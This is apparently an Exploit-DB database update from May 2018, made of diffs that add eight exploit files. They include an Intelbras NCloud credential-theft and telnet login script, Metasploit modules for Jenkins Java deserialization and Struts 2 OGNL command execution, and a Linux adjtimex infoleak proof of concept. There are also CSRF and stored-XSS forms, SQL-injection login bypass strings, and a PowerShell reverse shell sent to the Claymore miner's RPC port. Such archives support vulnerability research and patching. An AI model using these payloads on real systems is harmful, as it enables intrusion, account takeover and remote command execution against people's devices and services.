DB: 2018-05-18

8 changes to exploits/shellcodes

Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall

Libuser - roothelper Privilege Escalation (Metasploit)
Libuser - 'roothelper' Privilege Escalation (Metasploit)

Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution
Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
Jenkins CLI - HTTP Java Deserialization (Metasploit)
Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)
NodAPS 4.0 - SQL injection / Cross-Site Request Forgery
Intelbras NCLOUD 300 1.0 - Authentication bypass
SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass
Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery

exploits/hardware/webapps/44637.py

@@ -0,0 +1,80 @@
+# coding: utf-8
+# Exploit Title: Intelbras NCloud Authentication bypass
+# Date: 16/05/2018
+# Exploit Author: Pedro Aguiar - pedro.aguiar@kryptus.com
+# Vendor Homepage: http://www.intelbras.com.br/
+# Software Link: http://www.intelbras.com.br/empresarial/wi-fi/para-sua-casa/roteadores/ncloud
+# Version: 1.0
+# Tested on: Linux
+# CVE : CVE-2018-11094
+# Description: As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly
+# enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh').
+# The configurations backup file contains the web interface username and password. 
+# Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist, 
+# it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials
+# to log into the device using telnet.
+
+import sys
+import requests
+import telnetlib
+import re
+
+def help():
+    print 'Usage: '
+    print 'python exploit.py http://192.168.0.1'
+
+def pop_shell(host, user, password):
+    if(user == "root"):
+        print '[+] Trying default credentials: root:cary'
+    else:
+        print '[+] Trying credentials obtained from /cgi-bin/ExportSettings.sh'
+        with open('NCLOUD_config.dat', "r") as f:
+            content = f.read()
+            user = content.split("Login=")[1].split("\n")[0]
+            password = content.split("Password=")[1].split("\n")[0]
+            #print 'User: '+ user
+            #print 'Password: '+ password
+            f.close()
+    try:
+            ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', host)[0]
+            tn = telnetlib.Telnet(ip, 23, timeout=10)
+            tn.expect(["WORKGROUP login:"], 5)
+            tn.write(user + "\r\n")
+            tn.expect(["Password:"], 5)
+            tn.write(password + "\r\n")
+            i = tn.expect(["Login incorrect"], 5)
+            if i[0] != -1:
+                raise ValueError('[-] Wrong credential')
+            tn.write("cat /proc/cpuinfo\r\n")
+            tn.interact()
+
+            tn.close()
+    except Exception as e:
+        print e
+        if(user == "root"):
+            pop_shell(host, 'try', 'again')
+
+def exploit(host):
+    print '[*] Connecting to %s' %host
+    path = '/cgi-bin/ExportSettings.sh'
+    payload = 'Export=Salvar'
+
+    response = requests.post(host + path, data=payload)
+    response.raise_for_status()
+
+    if(response.status_code == 200 and "Login=" in response.text):
+        print '[+] Config download was successful'
+        print '[+] Saving backup file to NCLOUD_config.dat'
+        with open('NCLOUD_config.dat', "w") as f:
+            f.write(response.text)
+            f.close()
+        pop_shell(host, "root", "cary")
+def main():
+    if len(sys.argv) < 2 or not sys.argv[1].startswith('http://'):
+        help()
+        return
+    host = sys.argv[1]
+    exploit(host)
+
+if __name__ == '__main__':
+    main()

exploits/linux/dos/44641.c

@@ -0,0 +1,76 @@
+/*
+Commit 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native
+counterparts") removed the memset() in compat_get_timex(). Since then, the
+compat adjtimex syscall can invoke do_adjtimex() with an uninitialized
+->tai. If do_adjtimex() doesn't write to ->tai (e.g. because the arguments
+are invalid), compat_put_timex() then copies the uninitialized ->tai field
+to userspace.
+
+Demo:
+
+
+$ cat leak_32.c
+*/
+
+#include <sys/timex.h>
+#include <assert.h>
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <stdint.h>
+#include <err.h>
+
+/* from include/linux/timex.h */
+#define ADJ_ADJTIME 0x8000
+
+int main(void) {
+  struct timex tx;
+  memset(&tx, 0, sizeof(tx));
+  tx.modes = ADJ_ADJTIME; /* invalid, causes early bailout */
+  int res = adjtimex(&tx);
+  assert(res == -1 && errno == EINVAL);
+  printf("0x%08x\n", (unsigned int)tx.tai);
+  return 0;
+}
+
+/*
+$ gcc -o leak_32 leak_32.c -Wall -m32
+$ for i in {0..10}; do sleep 1; ./leak_32; done
+0x01a300b0
+0x0be8f6f0
+0x0610d5f0
+0x01fa0170
+0x0bf05670
+0x0bf05670
+0x0610d5f0
+0x0610cd70
+0x0610d5f0
+0x0610d5f0
+
+
+Fixed in master: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a0b98734479aa5b3c671d5190e86273372cab95
+
+
+Fix it by adding the memset() back.
+
+Fixes: 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native counterparts")
+Signed-off-by: Jann Horn <jannh@google.com>
+---
+ kernel/compat.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/kernel/compat.c b/kernel/compat.c
+index 6d21894806b4..92d8c98c0f57 100644
+--- a/kernel/compat.c
++++ b/kernel/compat.c
+@@ -34,6 +34,7 @@ int compat_get_timex(struct timex *txc, const struct compat_timex __user *utp)
+ {
+ 	struct compat_timex tx32;
+ 
++	memset(txc, 0, sizeof(struct timex));
+ 	if (copy_from_user(&tx32, utp, sizeof(struct compat_timex)))
+ 		return -EFAULT;
+ 
+-- 
+2.17.0.441.gb46fe60e1d-goog
+*/

exploits/linux/remote/44642.rb

@@ -0,0 +1,350 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  STAGE1 = "aced00057372002b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e466c6174334d6170a300f47ee17184980300007870770400000002737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0003787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740008041ac080131d170678787371007e00090000000077040000000078737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001f636f6d2e73756e2e6a6e64692e6c6461702e4c646170417474726962757465c47b6b02a60583c00300034c000a62617365437478456e767400154c6a6176612f7574696c2f486173687461626c653b4c000a6261736543747855524c7400124c6a6176612f6c616e672f537472696e673b4c000372646e7400134c6a617661782f6e616d696e672f4e616d653b787200256a617661782e6e616d696e672e6469726563746f72792e42617369634174747269627574655d95d32a668565be0300025a00076f7264657265644c000661747472494471007e001778700074000077040000000078707400156c6461703a2f2f6c6f63616c686f73743a313233347372001a6a617661782e6e616d696e672e436f6d706f736974654e616d6517251a4b93d67afe0300007870770400000000787871007e000e707871007e000e78"
+  # java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'touch /tmp/wtf'
+  STAGE2 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000e746f756368202f746d702f777466740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878"
+
+  SEARCH_REQUEST = 3
+  SEARCH_RES_ENTRY = 4
+  SEARCH_RES_DONE = 5
+  ABANDON_REQUEST = 16
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Jenkins CLI HTTP Java Deserialization Vulnerability',
+      'Description'    => %q{
+        This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
+        the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not
+        required to exploit this vulnerability.
+
+      },
+      'Author'         =>
+        [
+          'Matthias Kaiser', # Original Vulnerability discovery
+          'Alisa Esage', # Private Exploit
+          'Ivan', # Metasploit Module Author
+          'YSOSerial' #Stage 2 payload
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['linux', 'unix'],
+      'Arch'           => ARCH_CMD,
+      'Targets' => [ [ 'Jenkins 2.31', {} ] ],
+      'References'     =>
+        [
+          ['CVE', '2016-9299'],
+          ['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'],
+          ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'],
+          ['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'],
+          ['URL', 'https://github.com/frohoff/ysoserial']
+        ],
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 16 2016'
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
+      Opt::RPORT('8080'),
+      OptAddress.new('SRVHOST', [ true, "The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0", '127.0.0.1' ]),
+      OptPort.new('SRVPORT',    [ true, "The local port to listen on for the ldap server.", 1389 ]),
+      OptAddress.new('LDAPHOST', [ true, "The ldap host the exploit will try to connect to ", '127.0.0.1' ])
+    ])
+  end
+
+  def target_uri
+    begin
+      URI(datastore['TARGETURI'])
+    rescue ::URI::InvalidURIError
+      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
+      raise Msf::OptionValidateError.new(['TARGETURI'])
+    end
+  end
+
+  def normalize_uri(*strs)
+    new_str = strs * "/"
+
+    new_str = new_str.gsub!("//", "/") while new_str.index("//")
+
+    # Makes sure there's a starting slash
+    unless new_str[0,1] == '/'
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
+
+  def aseq(x, tag)
+    s = seq(x)
+    s.tag_class = :APPLICATION
+    s.tag = tag
+    s
+  end
+
+  def seq(x)
+    OpenSSL::ASN1::Sequence.new(x)
+  end
+
+  def int(x)
+    OpenSSL::ASN1::Integer.new(x)
+  end
+
+  def string(x)
+    OpenSSL::ASN1::OctetString.new(x)
+  end
+
+  def set(x)
+    OpenSSL::ASN1::Set.new(x)
+  end
+
+  def enum(x)
+    OpenSSL::ASN1::Enumerated.new(x)
+  end
+
+
+  def java_string(s)
+    length = s.length
+
+    packed_length = [length].pack("S>")
+
+    "#{packed_length}#{s}"
+  end
+
+  def search_res_done(message_id)
+    s = seq([
+      int(message_id),
+      aseq([enum(0), string(""), string("")], SEARCH_RES_DONE)
+      ])
+    s.to_der
+  end
+
+  def make_stage2(command)
+    [STAGE2].pack("H*").gsub("\x00\x0Etouch /tmp/wtf", java_string(command))
+  end
+
+
+  def make_stage2_reply(command, message_id)
+
+    java_class_name_attributes = seq([string("javaClassName"), set([string("WTF")])])
+    java_serialized_data_attributes = seq([string("javaSerializedData"), set([string(make_stage2(command))])])
+    attributes = seq([java_class_name_attributes, java_serialized_data_attributes])
+    s = seq([
+      int(message_id),
+      aseq([string("cn=wtf, dc=example, dc=com"), attributes], SEARCH_RES_ENTRY)])
+    s.to_der
+  end
+
+
+
+  def make_stage1(ldap_url)
+    [STAGE1].pack("H*").gsub("\x00\x15ldap://localhost:1234", java_string(ldap_url))
+  end
+
+
+  def read_ldap_packet(socket)
+
+    buffer = ""
+
+    bytes = socket.read(2)
+    if bytes[0] != "0"
+      raise "NOT_LDAP: #{bytes.inspect} #{bytes[0]}"
+    end
+
+    buffer << bytes
+
+    length = bytes[1].ord
+    if (length & (1<<7)) != 0
+      length_bytes_length = length ^ (1<<7)
+
+      length_bytes = socket.read(length_bytes_length)
+      buffer << length_bytes
+      length = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e}
+    end
+
+    buffer << socket.read(length)
+    buffer
+  end
+
+
+  def write_chunk(socket, chunk)
+    socket.write(chunk.bytesize.to_s(16) + "\r\n")
+    socket.write(chunk)
+    socket.write("\r\n")
+  end
+
+  def exploit
+    uuid = SecureRandom.uuid
+
+    ldap_port = datastore["SRVPORT"]
+    ldap_host = datastore["SRVHOST"]
+    ldap_external_host = datastore["LDAPHOST"]
+
+    command = payload.encoded
+    host = datastore["RHOST"]
+
+    ldap = TCPServer.new(ldap_host, ldap_port)
+
+    cli_path = normalize_uri(target_uri.path, "cli")
+
+    begin
+
+      download = connect()
+
+      begin
+
+        download.write("POST #{cli_path} HTTP/1.1\r\n" +
+          "Host: #{host}\r\n" +
+          "User-Agent: curl/7.36.0\r\n" +
+          "Accept: */*\r\n" +
+          "Session: #{uuid}\r\n" +
+          "Side: download\r\n" +
+          "Content-Length: 0\r\n" +
+          "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
+
+        download.read(20)
+
+        upload = connect()
+        begin
+          upload.write("POST #{cli_path} HTTP/1.1\r\n" +
+            "Host: #{host}\r\n" +
+            "User-Agent: curl/7.36.0\r\n" +
+            "Accept: */*\r\n" +
+            "Session: #{uuid}\r\n" +
+            "Side: upload\r\n" +
+            "Content-type: application/octet-stream\r\n" +
+            "Transfer-Encoding: chunked\r\n\r\n")
+
+          write_chunk(upload, "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=")
+          write_chunk(upload, "\00\00\00\00")
+
+          upload.flush
+
+          stage1 = make_stage1("ldap://#{ldap_external_host}:#{ldap_port}")
+
+          chunk_header = [stage1.bytesize].pack("S>")
+          write_chunk(upload, chunk_header + stage1)
+
+          upload.flush
+
+          client = ldap.accept
+          begin
+
+            # this hardcodes an ldap conversation
+
+            # read bindRequest
+            read_ldap_packet(client)
+
+            # write bindResponse
+            client.write(["300c02010161070a010004000400"].pack("H*"))
+
+            # read searchRequest
+            read_ldap_packet(client)
+
+            # write searchResEntry
+            client.write(["3034020102642f04066f753d777466302530230411737562736368656d61537562656e747279310e040c636e3d737562736368656d61"].pack("H*"))
+
+            # write searchResDone
+            client.write(search_res_done(2))
+
+            # read abandonReqeust or searchRequest
+            bytes = read_ldap_packet(client)
+            packet = OpenSSL::ASN1.decode(bytes)
+
+            # abandonRequest packet is sometimes sent
+            # so we distinguish between abandonRequest/searchRequest
+
+            tag = packet.value[1].tag
+            if tag == ABANDON_REQUEST
+
+              bytes = read_ldap_packet(client)
+              packet = OpenSSL::ASN1.decode(bytes)
+              tag = packet.value[1].tag
+            end
+
+            if tag == SEARCH_REQUEST
+
+              message_id = packet.value[0].value.to_int
+              # write searchResEntry
+              client.write(make_stage2_reply(command, message_id))
+
+              # write searchResDone
+              client.write(search_res_done(message_id))
+            else
+              raise "Unexpected packet: #{tag}"
+            end
+
+            client.flush
+          ensure
+            client.close
+          end
+        ensure
+          upload.close
+        end
+      ensure
+        download.close
+      end
+
+    ensure
+      ldap.close
+    end
+  end
+
+  def check
+    result = Exploit::CheckCode::Safe
+
+    begin
+      if vulnerable?
+        result = Exploit::CheckCode::Vulnerable
+      end
+    rescue Msf::Exploit::Failed => e
+      vprint_error(e.message)
+      return Exploit::CheckCode::Unknown
+    end
+
+    result
+  end
+
+  def vulnerable?
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path)
+    })
+    unless res
+      fail_with(Failure::Unknown, 'The connection timed out.')
+    end
+
+    http_headers = res.headers
+
+    http_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= "2.31"
+  end
+
+  # Connects to the server, creates a request, sends the request,
+  # reads the response
+  #
+  # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
+  #
+  def send_request_cgi(opts={}, timeout = 20)
+
+    begin
+      c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
+      c.connect
+      r = c.request_cgi(opts)
+      c.send_recv(r, timeout)
+    rescue ::Errno::EPIPE, ::Timeout::Error
+      nil
+    end
+  end
+
+end

exploits/linux/webapps/44640.txt

@@ -0,0 +1,62 @@
+# Exploit Title: Powerlogic Schneider Electric IONXXXX Series - Cross-Site Request Forgery
+# Date: 2018-05-17
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: http://www.schneider-electric.com/
+# Version: ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, PM5XXX series.
+# Tested on: All Version
+# CVE : CVE-2016-5809
+
+# PoC
+
+
+<form name="frmConfig" action="http://TargetIp/SetupReceipt.html
+<http://targetip/SetupReceipt.html>" method="post">
+select name="PMLSel_0x7800">
+<option selected="selected">9S - 4 Wire Wye/Delta</option>
+<option>35S - 3 Wire</option>
+<option>36S - 4 Wire Wye</option>
+<option>DEMO</option>
+</select>
+<select name="PMLSel_0x7a4a">
+<option selected="selected">Normal</option>
+<option>Inverted</option>
+</select>
+<input type="text" name="PMLIFl_0x7000" size="15" value="480.00"/>
+<select name="PMLSel_0x7a4b">
+<option selected="selected">Normal</option>
+<option>Inverted</option>
+</select>
+<input type="text" name="PMLIFl_0x7001" size="15" value="480.00"/>
+<select name="PMLSel_0x7a4c">
+<option selected="selected">Normal</option>
+<option>Inverted</option>
+</select>
+<input type="text" name="PMLIFl_0x7002" size="15" value="200.00"/>
+<input type="text" name="PMLIFl_0x7003" size="15" value="5.00"/>
+<select name="PMLSel_0x7801">
+<option selected="selected">Normal</option>
+<option>Inverted</option>
+</select>
+<select name="PMLSel_0x7802">
+<option selected="selected">Normal</option>
+<option>Inverted</option>
+</select>
+<select name="PMLSel_0x7803">
+<option selected="selected">Normal</option>
+<option>Inverted</option>
+</select>
+<input type="text" name="PMLIFl_0x7004" size="15" value="5.00"/>
+<select name="PMLSel_0x7a49">
+<option selected="selected">Normal</option>
+<option>Inverted</option>
+</select>
+<input type="text" name="PMLIFl_0x7005" size="15" value="5.00"/>
+<input type="text" name="PMLIFl_0x721a" size="15" value="0.00"/>
+<input type="text" name="PMLIStr_0x1345" size="15" value="EPMAPS"/>
+<input type="text" name="PMLIFl_0x70b4" size="15" value="900.00"/>
+<input type="text" name="PMLIStr_0x1346" size="15" value="POZO SAN"/>
+<input type="text" name="PMLIFl_0x70c4" size="15" value="1.00"/>
+<input type="text" name="PMLIStr_0x1347" size="15" value="ANTONIO PICHIN."/>
+<input type="text" name="PMLIFl_0x70d4" size="15" value="70.00"/>
+<input type="submit" class="btn" value="Save" name="Submit22" />
+</form>

exploits/multiple/remote/44643.rb

@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution',
+      'Description'    => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'icez <ic3z at qq dot com>',
+        'Nixawk',
+        'xfer0'
+      ],
+      'References'     => [
+        [ 'CVE', '2017-9791' ],
+        [ 'BID', '99484' ],
+        [ 'EDB', '42324' ],
+        [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048'  ]
+      ],
+      'Privileged'     => true,
+      'Targets'        => [
+        [
+          'Universal', {
+            'Platform'       => %w{ linux unix win },
+            'Arch'           => [ ARCH_CMD ]
+          }
+        ]
+      ],
+      'DisclosureDate' => 'Jul 07 2017',
+    'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]),
+        OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ])
+      ]
+    )
+  end
+
+  def send_struts_request(ognl)
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+    uri = normalize_uri(datastore['TARGETURI'])
+
+    data = {
+      datastore['POSTPARAM']    => ognl,
+      'age'                     => var_a,
+      '__checkbox_bustedBefore' => 'true',
+      'description'             => var_b
+    }
+
+    resp = send_request_cgi({
+      'uri'       => uri,
+      'method'    => 'POST',
+      'vars_post' => data
+    })
+
+    if resp && resp.code == 404
+      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
+    end
+    resp
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+    ognl = "%{'#{var_a}' + '#{var_b}'}"
+
+    begin
+      resp = send_struts_request(ognl)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
+    end
+
+    if resp && resp.code == 200 && resp.body.include?("#{var_a}#{var_b}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    resp = exec_cmd(payload.encoded)
+    unless resp and resp.code == 200
+      fail_with(Failure::Unknown, "Exploit failed.")
+    end
+
+    print_good("Command executed")
+    print_line(resp.body)
+  end
+
+  def exec_cmd(cmd)
+    ognl = "%{(#_='multipart/form-data')."
+    ognl << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+    ognl << "(#_memberAccess?(#_memberAccess=#dm):"
+    ognl << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    ognl << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    ognl << "(#ognlUtil.getExcludedPackageNames().clear())."
+    ognl << "(#ognlUtil.getExcludedClasses().clear())."
+    ognl << "(#context.setMemberAccess(#dm))))."
+    ognl << "(#cmd='#{cmd}')."
+    ognl << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+    ognl << "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())."
+    ognl << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+    ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
+
+    send_struts_request(ognl)
+  end
+end

exploits/php/webapps/44636.txt

@@ -0,0 +1,44 @@
+# Exploit Title:  Online Booking system - NodAPS 4.0 - 'search' SQL injection / Cross-Site Request Forgery
+# Date: 2018-05-16
+# Exploit Author: Borna nematzadeh (L0RD)
+# Vendor Homepage: https://codecanyon.net/item/appointment-management-system-nodaps/16197805?s_rank=1535
+# Version: 4.0
+# Tested on: windows
+================================================
+# POC 1 : SQLi
+
+
+# test : test.com/en/providers?search='
+# Description: Put ' in the search parameter and you will have SQL syntax error.
+You can use "extractvalue()" or "updatexml()" functions to get data from database.
+
+================================================
+# POC 2 : CSRF
+
+# Description: An issue was discovered in Online Booking system - NodAPS 4.0 script.
+With Cross-site request forgery (CSRF) vulnerability , attacker can hijack the authentication of users remotely.
+
+================================================
+
+# Exploit :
+
+<html>
+ <head>
+     <title>CSRF POC</title>
+ </head>
+    <body>
+    <form action="http://test.com/admin/accountSetting" method="POST">
+      <input type="hidden" name="data&#91;username&#93;" value="testcsrf />
+      <input type="hidden" name="data&#91;email&#93;" value="lord&#46;nematzadeh123&#64;gmail&#46;com" />
+      <input type="hidden" name="data&#91;firstname&#93;" value="test2" />
+      <input type="hidden" name="data&#91;lastname&#93;" value="test3" />
+      <input type="hidden" name="data&#91;mobile&#93;" value="1000000000" />
+      <input type="hidden" name="data&#91;website&#93;" value="" />
+      <input type="hidden" name="data&#91;password&#93;" value="1234567890&#45;" />
+      <input type="hidden" name="data&#91;language&#95;id&#93;" value="1" />
+    </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+  </body>
+</html>

exploits/php/webapps/44639.txt

@@ -0,0 +1,38 @@
+# Exploit Title: SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass
+# Date: 2018-05-17
+# Exploit Author: L0RD
+# Vendor Homepage: https://codecanyon.net/item/supercom-online-shopping-ecommerce-cart/17085987?s_rank=1442
+# Version: 1
+# Tested on: Kali linux
+
+# Description: SuperCom - Online Shopping Ecommerce Cart 1 suffers from multiple vulnerabilities :
+# POC 1 : Persistent cross site scripting :
+
+1) After creating an account , go to your profile.
+2) Navigate to "Update profile" and put this payload :
+"/><script>alert(document.cookie)</script>
+3) You will get an alert box in the page .
+
+# POC 2 : CSRF : Attacker can change user's authentication directly :
+
+<html>
+<head>
+    <title>CSRF POC</title>
+</head>
+<body>
+    <form action="http://ecommerce.thesoftking.com/updateprofile"
+method="post">
+        <input type="hidden" name="name" value="anything">
+        <input type="hidden" name="mobile" value="1000000000">
+        <input type="hidden" name="address" value="anything">
+    </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+</body>
+</html>
+
+# POC 3 : Authentication bypass :
+Path : /admin
+Username : ' or 0=0 #
+Password : anything

exploits/windows/remote/44638.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
+# Date: 2018/02/09
+# Exploit Author: ReverseBrain
+# Vendor Homepage: https://nanopool.org/
+# Software Link: https://github.com/nanopool/Claymore-Dual-Miner
+# Version: 7.3 and later
+# Tested on: Windows, Linux
+# CVE : 2018-1000049
+
+Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
+
+powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
+
+Convert it into hexadecimal and paste it on the second parameter inside this string:
+
+echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
+
